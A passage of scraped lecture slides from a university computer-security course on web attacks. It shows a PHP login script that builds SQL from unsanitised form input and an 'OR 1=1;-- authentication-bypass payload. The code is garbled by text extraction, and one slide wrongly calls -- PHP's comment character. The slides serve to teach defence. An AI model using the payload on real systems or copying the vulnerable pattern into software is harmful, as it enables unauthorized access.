![Page 183: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/183.jpg)
SQL Injection — Bypassing Authentication
Consider this server-side login script:✞ ☎
<?php$query = ’SELECT ∗ FROM u s e r s
WHERE ema i l=’ . $ POST [ ’ ema i l ’ ] . ’ ” ’ .’AND pwdhash=” ’ . hash ( ’ sha256 ’ , $ POST [ ’ password ’ ] ) . ’ ” ’
i f ( mysq l num rows ( $out )>0) {echo ” Log in s u c c e s s f u l ! ” ;
} e l s e {$a c c e s s = f a l s e ;echo ” Log in f a i l e d ” ;
}?>✝ ✆
Attacks on Servers 76/79
![Page 184: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/184.jpg)
SQL Injection — Bypassing Authentication
Let the attacker enter this into the login form:
email="OR 1=1;--
password=(empty)
Then, the original query✞ ☎
SELECT ∗ FROM u s e r s WHERE ema i l=’ . $ POST [ ’ ema i l ’ ] . ’ ” ’ .’AND pwdhash=” ’ . hash ( ’ sha256 ’ , $ POST [ ’ password ’ ] ) . ’ ” ’
✝ ✆
turns into✞ ☎
SELECT ∗ FROM u s e r s WHERE ema i l=””OR 1=1; −− AND pwdhash = . . .✝ ✆
Note that -- is PHP’s comment character.
The query returns the entire user table to the attacker.
Attacks on Servers 77/79
![Page 185: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/185.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 Summary
Summary 78/79
![Page 186: CSc 466/566 Computer Security 22 : Web Securitycollberg/Teaching/466... · HTTP over Secure Socket Layer (HTTPS) 1 Alice browses to 2 The browser sends chase.com a list of cryptographic](https://reader036.vdocuments.mx/reader036/viewer/2022070907/5f7d20807a89ff19fb1274d9/html5/thumbnails/186.jpg)
Readings and References
Chapter 7 in Introduction to Computer Security, by Goodrichand Tamassia.
Summary 79/79